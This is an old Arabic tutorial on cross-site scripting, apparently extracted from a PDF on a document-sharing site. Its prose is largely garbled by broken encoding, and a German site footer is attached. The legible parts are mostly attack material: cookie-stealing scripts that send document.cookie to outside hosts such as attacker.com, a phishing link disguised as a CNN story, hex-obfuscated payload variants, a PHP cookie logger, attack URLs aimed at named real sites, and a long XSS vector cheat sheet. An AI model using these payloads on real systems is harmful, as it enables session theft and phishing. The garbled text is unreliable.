XSS

AlQuRsAn Cross Site Scripting www. sfh.
com/vb
AlQuRsAn Cross Site Scripting www. sfh.com/vb
!" # $ %&' " ( )* +

;/ <) / 0 1 2 $ '/0( , 3 456 7- " 89 0 2 :. !" ( , -
.=0> ? ( , + 2 @ <1 ? A0 B C
> G .. #@ > + CSS 2 JK. D E FG )* + H I DE F )* +
.;O + " N @ L M$ $? ? 7
.= -Y Z[ " CSS 4 P #O /Q R 0 SO$ TP U )V WX
CSS
2 )-_ 1 2 $ '/0( $0 > ^]XSS Z[ " \Cross Site Scripting
a W b c d '0OG /3 1 * e )- #@ 2 + . ` '6 @ I ( , +
<"U " 6j)* i WX iJ[ ( , + fWg h 3 ^=6 ` '6 @ !
.Z$?G WX k * lfWm T 3 B ! ... 6 @ 3O "
] 6jn c0 "\HEX f )* + e ` 'Q @ I E ;8> n c0 - ( $ o ,+ #@
. $ ( , + =< t u' v *" s I s" 1 / =lp qr+
!7)/ >O6 & e 2 ycl" s I01 2 $ '/0 /3 x8! I x 2 l ' )w
.@ I iJR W &[ 2 & uWX z< t s"
XSS CSS
Cascading ) L ' <| a I CSS WIX Cross Site Scripting {L Tt
q Y I . CSS WIX Z[ " { W Style Sheets
" ' 3 s~ . XSS WIX Cross Site Scripting z<nc -Y e N ,+ }
.XSS• 2 J uWX -
Cross Site TI =l<TP 0%l" XSS # JK2 > l" 4 $ ?" % € r<%l" Zr<
.• 6 Ic Scripting
XSS
" ActiveX " VBScript " Java Script @ ! ‚ O@< " $? I7 ) / n ! 4 ?" e
f ? ;Mv ! .=0 )w @ I W… ) / „... ƒ ,c Flash " HTML
„„„. I† ‡ˆ 6 3 ‰ " 8! I * 3 " =0@ <nJ0 " ( , +
‹Š )* + XSS o ,+ Z | , + # m 'Q @ !p
http://archives.neohapsis.com/archives/vuln- -
o 6Œ I† xDenial Of Servicex• 0 # m d$ [a )* + WX
.& $ + 3 " * ˆ ' ( , + r<)* - M•$
'XSS ! "#$%&
A + WX .PHPNuke X O Pc+ PHP A l e s I0XSS 2 JK #?
.A + WX ' c „.. I† ? %* e N V P + -Ž s I
‹A + W7 0)* + 2 ˆ '0OŒ } uWX
http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
!"##!$! %
http://www.cgisecurity.com/archive !! !"##! %
.# ? i$VA + WX /J O$0 • l)* + uWX ( $0
() " * + ,-. /#0 ) 1 2 %

$• - 0 I•2 G 6 + 2 nJ+ } ,+ 1 2 $ '/0 8! I * 3 - 0
. ,+ I7 1 3" i 4 WX E e i? ^@ !
8 92 7 3 4 56
‘ O I†s ! r< @ I Vi O $0)* + X ƒ &V<)* + e f 2 $ '/0e # J @g<
)* + M , + 8! I B o lO $l ’ Zr<.... " < 8! I ( , )* + ;8> p
.E iJR r<)* + 1 ? • Q 8! I B W6ylO $l “O WX
;-%+< : 4 56
Ic Pt0MI 1 0 } ' ‚ 2 O- 3Œ } XO- 3 ! e B ” XSS 2 JK
R h56 J Ic & Pt 3 Script 6 @@ ! 4 6@< ^s y o
& t N & - ( $ I7 1 g I IP > • s I0h 3 •P 9
P> W 0 2 J U 6" J # v " Java Script VR<‚ ’ — ^ @ Ic XO P–
. L Y )* + ;8> URL nvy0 6 @( , +
e 2 ˆ '0OŒ uWX .)* - O' 6Œ - ( $0MI [ + 2 ˆ '0OG } > 0 3"
)* + WX z<( , - 8! I B 3 0h 3 ( , + P iJ[ 3p
www.cgisecurity.com/cgi-bin/cookie.cgi
.( , + f Y 8! I W… 4 6 ) / 0s~ %l<^ PV8! I B Pt h 3
Java Script ( , 3˜ 8! I *
4
‹( 4
" š l<HEX • ™ ;8m e 1 / ASCII • 4 p ;8m e 1 / Š 4 + e
.. [V" # v ' +e @ !p
‹ ASCII ( , 3<
http://host/a.php?variable="><script>document.location='http://www.cgise
> curity.com/cgi-bin/cookie.cgi?'' (document.cookie</script
&
‹ HEX ( , 3<
* + ,' ' ' '- '. '- './'- '-0' '
.0'.1'. '-$'. '.$'. '-0' '. '.1'. '. '-0'./'.1'.
' ' -'.2'-0'-0'- ' ' 1' 1'--'--'--' '. '.-'./'
- '.$'. '-$'- './'-0'-/' '. '.1'. ' 1'. '.-'./'
'. './'. ' 1'. '.1'.1'.+'./'.$' '. '.-'./' 1' -'
' +'.0'.1'. '-$'. '.$'. '-0' '. '.1'.1'.+'./'.$'
' 1'- '. '- './'- '-0'
. + WX › e HEX4 8 ( *Op h Y ) w n c0‚O@y3

8! I 2 )-m P , 3<) / 0 '6 Java Script @ !" ( , 3Œ ( 4 WX
. (5 3Œ e 8! I 4 3O< ˆ cgisecurity.com )* z<1 / 4 3O<
.)* + T3<‹ Host
.@ ! W - W nJ+ … > & ‹ a.php
.@ I W W nJ+ ‹ Variable
‹ @I
"œ •xscript>document.location='http://www.cgisecurity.com/cgi-
+3 *4
' ( 3 5 >
q@ I - X
‹ & z<1 /! 8! I B 4 3O< - ( $
http://www.cgisecurity.com/cgi-bin/cookie.cgi
‹ X 8! I žO E I• 8! I B (5 3˜ ( $0uWX &
www.cgisecurity.com/articles/cookie-theft.log
? => 2 #
My cookie = user=zeno; id=
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
‹Š ! )* + z<1 / 3 h 3
GET /cgi-bin/cookie.cgi?user=zeno;' id=
)
e , 3< j Ic @ I Pt M! @ I ;8m n c0 - ( $ s" I7 =l< l!r

qn c Ÿ B ! HEX 4+
#ntlz< c % T* )> 02 & + c %3 T*O $ 8 O " h ? " T*O !
‹ <script> -! 4
' C $ <
'- $ s
'- $ r
'./ $ i
'- $ p
'-0 $ t
' E $ >
WIX + e <script> -! )R ) / l r<
' "'- '- './'- '-0' 7
XSS @ A&# 4 56
Pt0MI hexf @ I n c0 ˆ $ @ !p @ ! s~ ) 0‚ %l"
hex• c+ n6p @ I )R !y0E r Ec *% @ Ic N , -
.. " U " Œ 6 @( , -
• ,vp • I† I N • ,vp '* WX @ I h c ! T I†
.N@
= M v n¡ - %-* E l<( , + ¢?5 E r 8! I B * 3 T 4+e
Ic )* + 8! I B %* 3 - ( $ s ?p Tt e m I7 I
.s p u c WX ( , + '* ¢?5 n¡ ) 3
6
@ > @ I s ! r< " 3 V Java Script @ ! W 0

E IF Œ A }
. 3 ) V B -!
3 ) V s ! r<Java Script @ ! W - 0Hotmail #n'I )* + Tt
.8! I * 3 ) F# V - ( $0 I
, B@C D 'E 4 56
e ˆ ? %l<z<% I z< 3 0— )- 2 + ^ # J '/ ( , > % / 3< r<
Websleuth u@" ( , 0) / 08! I E F%l<s~ cookie.cgi e X E *
.( , + f ? B /6 s I Œ s ! r<U
.. X 8! I * 3 I # + @g<E I•
http://www.idefense.com/XSS.html
>AF G )EH IJ
@ !p n c0 )R e A O " 'l
‹ z p # /Q
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<
script>document.location.replace('http://attacker.com/ste
al.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>
. <a> T3 % d '0O˜! & e @I R X
8
- nJ & uWX e s I index3a_page2.html & ( $ q@ I -

.8! I B 1 & ( $0U 6" z< & 4 a @ ! )[lnJ+ ( " X tw X @ I W
‹ l # /Q
q Y ... U 6" & z<=P> ( $ 3 =lp F V cI s I0 $ # /Q
<html>
<head>
</head>
<body>
<a
age2.html?tw=<
script>document.location.replace('http://attacker.com/ste
al.cgi?'+docum
ent.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN
story out!
</a>
</body>
9
</html>
‹ MX @ I / 2 5 0 R"
IZ/News/05/02/clinton.talkshow.reut/index.html';return
true"
onMouseOut="window.status='';return true"
. /+ & v '+ & T i $
‹ # /Q
...= " # X– 2 5 & !U & @ ! z< t ( , + I† Ic > 0 [ " X
<html>
<head>
</head>
<body>
<a
age2.html?tw=<script>var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x002E);
:
u %2B= document.cookie;
document.location.replace(u);</script>"
IZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN
story out!
</a>
</body>
</html>
‹ R
h Y @ !" nJ+ WX e R u €<=6 nJ V <script> R tw nJ+
• l I+
http://attacker.com/hack.cgi?'+document.cookie;
.h ? h ?
http
x .2 $ h
x -0 $ t
x -0 $ t
x - $ p
x A $ ‹
x F $ £
e u -$ R E r
document.location.replace(u);
.@ I )' 0 @ ƒ ,c 1 `•
KDL 4 B@ M /+
.... )R @ ! " '$0` • 2 nJ- # V - ( X1 '
‹4
xss.php P- l@ ! " W nJ php J & - ( $l
http://localhost/xss.php
;
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
if ( isset($code) )
echo stripslashes($code);
echo "<form method='get ><input type='text'

name='code'><input type='submit'></form> ;
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
res.php P- l8! ! ¥c 0 &
http://localhost/res.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
Setcookie("myname" , "alqursan" , "time()+(3600");
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
cookies.php P- l8! I B T 0 &
http://localhost/cookies.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
$data=$HTTP_COOKIE;
$fp = fopen("log.htm","a");
flock ($fp,2);
fputs ($fp,<BR>$data);
flock($fp,3);
fclose($fp);
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
log.htm - lM>O6 B e 8! I 9 0 - & uWX ( $0

http://localhost/log.htm
‹2 /Q
‹Š Ž z< $ 2 & |5 - ¦§P> e Mc0 " Vn3 E sI sd c
C:\apache\htdocs
..php T W E * z<2 + uWX )VO "
8! ! )R ‹ z p # /Q
.. & V<
http://localhost/res.php
.. & —
http://localhost/xss.php
) + e Š @ I 6@"
<script>document.location='http://localhost/cookies.php?'+document.cook
ie</script>
‹ & @ < T3< Š 1 !< "
?word=<script>document.location='http://localhost/cookies.php?'+docume
nt.cookie</script >
8! I B 9 ( $0 XO & uWX cookies.php z <8! I B 4 3O<T X

‹ & V<8! I B ž log.htm & uWX e
http://localhost/log.htm
q# J uWX -Y T0B ! I # I R 0%Fs~
R ’ xss.php & ei Y
stripslashes($code);
)[l l
addslashes($code);
4 Y f >... z p h W• 6j ? Z[ "
... & T- s I y/Q s< W! TP l
9N/) = A:= E0 )
s I 3 Z' ¡ ›p E #@ > + @ !¨ # V - T* ( , ><uWX y 0G /
. XSS
I† .¦ R P- 3< ?" r<E - " r©0 * XSS 2 JK !W0. &gt &lt z<> < n¡
.s B Ic E * 6 ‰ 0 E • § ” E W L # J uWX c I7
&<0 z<] \Z[ " Š # VE 1 g XSS ! c+ ! > < # V
. 1 0 &< 2 &< $ z<ª & Z[ " &<0
O P% -) = A:= E0 )
)* + = iJ[ @ + d '0OG )' 0i$VE lM- s" Z > P3 @ ( , % ! r<
e i WX I T* asfh.com «5 )* z<i O=V2 > )* 2 O§ r<. M •
. Ic+ uWX ® ¬- a h 3 WX & e i iJ[ s @E &
.E <e V + B + " E <%& V%l" r<# v ' W 0h 3 XSS Zl ?"
.= $ ;Mv " e 05V ' G ƒ ,v " V 0G ƒ ,v 3O %- 3 %l" r<
U )R .E & 2 @ < Java Script ¡" /Q WX E l -Y U 6" $ ˆ
. 0;Mv " ( Ic WX .8! I B %* 3 ) • WX high E & e -Y
XSS !Q .R 0 )
. #n'I )* + e @ > ( , 3Œ P3 ›p § I7 N 3 # Pv %' !<XSS 2 JK
.. n ! )* ¦ X
FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft,
Zdnet, Wired, and Newsbytes
Pv ! #nPc 2 9 + e > 0. XSS 2 JK4 Iv" Iv )* + uWX !
)* ) 0x XO- 3 $ / ‘ v 7#Oc 3 clT XSS # JK°±¤¯- Z' $0
.x²O I
-U SSL SAT% D
)* + ^i$VT )* + 1 ˆ !y )* + } e s I *@ + 4 ! 0 WX ZG "
.4 ! 0 ³ WX ( , 0G )* + P ´ 80G SSL ( , 0
^ c+ 4 0G e s I+ H lW6y o ,+ ^ e -! ;Mc H l - 01 2 $ '/0
&
WX I . j ( Mv ! s" TP& 3" @ > + $ Xc [ L

. h 5J i$V
XSS 4 ! 5+ EV /5#9 5%+ED

e Q - 3 I7 r<.@ • '/0 IF ^Java Script @ ! ‚ O@˜ - 0XSS # JK
.i$Vx( , + x + P> " W ) / X Zr< I† p '/0s ! +
e s I0s" I• U 6" 2 JK# + P , 3 ) / 0 XSS 2 J i O @e
. +
XSS 4 !WXY Z O *E[ :E \] U

e ` '6 @ ! )[ l" f ? E •( , p s I Œ s I # J uWX ‘5 <(
. " VRŒ E *
.)3 Ic 2 c l< * s I0 Y #n'I )* + µv e X h 3 XSS
c0 O R 1 ' WX I† E ! v /6 Ic WX X cl PVc ! =I• ƒ ,v
$ 0E W E •5- $K¦ $ * WX E •5- z< •3O 3 I•Z[ " E ! v % -
.E TP 0
_4 NA, " ` *a IE 4 ^ bc _ 4( ^ !
+ 51 ' ,= + 5 > 3 ? 3t.cookies)

</script>"></iframe•
Zorum version 0 A e # JK
http://www."any site".com/pathofzorum/index.php?method=<
script>alert('test')</script>
)
http://www.microsoft.com/education/?ID=MCTN&target=http://www.mic
rosoft
com/education/?ID=MCTN&target="><script>alert(document.cookie)</sc
ript>
+ 3 2 3 % ! * ,5
ript>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</
>@1 ,0@ , @ ,AABA@ , @ , @C ,
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search
_text"><script>alert"document.cookie</script>
>AF -F # &. A# . &% O + O P%+Z , E

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh"
content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image:
url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
6
<div style="width: expression([code]);">

<style type="text/javascript">[code]</style>
<object classid="clsid:..."
codebase="javascript:[code]">
<style></script>
<![CDATA[</script>
<script>[code]</script>
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml
id="X"><a><b><script>[code]</script>;</b></a
></xml>
<div datafld="b" dataformatas="html"
datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
5 >D## is behind 5 >
‹ 4 # 0 W @ I [ code ] 4 ' 3< '3 !e
<script>[code]</script>
‹ Xn¡ " @ !p ?y = ' 3<T
document.write(document.cookies)
alert('alqursan');
document.location='http://site/cookie.php*4
' ( 3
.# J H l Jc0( 3 '3 ! Zˆ v H
6 @s I0¶ i Oe #@ > s I0 I•G 2 & @ !" 6 @W 0@ !p WX }
.i$V2 & @ !"
8
? H G )3 %) H S ) ) A% HEX ( %8 L d , ^
EFGH
I JKLHI EFGH
I JKLHI
'$ P ' MN
OPK
'$ Q ' !
'$ R ' "
'$ S ' #
'$0 T ' 0 $
'$$ U ' $ %
'$. V ' . &
'$- W ' 2 (
'$2 X ' / )
'$/ Y ' Q *
'$Q Z ' R +
'$R [ ' " ,
'$" S ' T -
'$T ] ' 7 .
'$7 ^ ' 1 /
'$U _ '
'. ` '
'. a '
'. b '
'. c ' 0 0
'.0 d ' $ $
'.$ e ' . .
'.. f ' - -
'.- g ' 2 2
'.2 h ' / /
'./ i ' Q :
'.Q j ' R ;
'.B k ' " <
'." l ' T =
'.T m ' 7 >
'.7 n ' U ?
'.1 o '0 @
9
'- p %0 A
'- q %0 B
'- r %0 C
'- s %00 D
'-0 t %0$ E
'-$ u %0. F
'-. v %0- G
'-- w %02 H
'-2 x %0/ I
'-/ y '0Q J
'-Q z '0R K
'-R { '0" L
'-" | '0T M
'-T } '07 N
'-7 ~ '0U O
e 2 @ f,. eXg< 4G ( b \e ^ "`9*

http://www.usatoday.com/life/cyber/tech/ - 2- -hotmail-security-
side.htm
http://www.perl.com/pub/a/ /css.html
http://www.cert.org/advisories/CA- - .html
http://www.cert.org/tech_tips/cgi_metacharacters.html
http://eyeonsecurity.net/papers/passporthijack.html
http://www.eccentrix.com/education/b iler/tutorials/javascript.htm#cookie
s
:
9^
xThe Cross Site Scripting FAQ x, ww.cgisecurity.com/articles/xss-faq.txt,
admin@cgisecurity.com
David Endler, The Evolution of Cross-Site Scripting Attacks,

dendler@idefense.com ,V W
BrainRawt, Cross-Site Scripting Explained, brainrawt@hotmail.com
Silent Needle, secure PHP from XSS & SQL Injection ,

silentneedle@hotmail.com
-h i
T Ÿ" #5 [V" =j -• l 3 · T " · WX
; ¹ l 0G N - + ) w + W… ) s" ¸ I · 4y3"
s $ 1 : T! 6"
‹ Š s z< 3O" t?5+ " O 3º
Alqursan_ @hotmail.com
1 0I – • o $Y ) w

XSS

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

XSS

Hochgeladen von

Copyright:

Verfügbare Formate

AlQuRsAn Cross Site Scripting www. sfh.

!" # $ %&' " ( )* +

() " * + ,-. /#0 ) 1 2 %

. + WX › e HEX4 8 ( *Op h Y ) w n c0‚O@y3

e , 3< j Ic @ I Pt M! @ I ;8m n c0 - ( $ s" I7 =l< l!r

@ > @ I s ! r< " 3 V Java Script @ ! W 0

- nJ & uWX e s I index3a_page2.html & ( $ q@ I -

echo "<form method='get ><input type='text'

log.htm - lM>O6 B e 8! I 9 0 - & uWX ( $0

8! I B 9 ( $0 XO & uWX cookies.php z <8! I B 4 3O<T X

WX I . j ( Mv ! s" TP& 3" @ > + $ Xc [ L

XSS 4 ! 5+ EV /5#9 5%+ED

XSS 4 !WXY Z O *E[ :E \] U

+ 51 ' ,= + 5 > 3 ? 3t.cookies)

>AF -F # &. A# . &% O + O P%+Z , E

<div style="width: expression([code]);">

‹ 4 # 0 W @ I [ code ] 4 ' 3< '3 !e

e 2 @ f,. eXg< 4G ( b \e ^ "`9*

David Endler, The Evolution of Cross-Site Scripting Attacks,

BrainRawt, Cross-Site Scripting Explained, brainrawt@hotmail.com

Silent Needle, secure PHP from XSS & SQL Injection ,

Das könnte Ihnen auch gefallen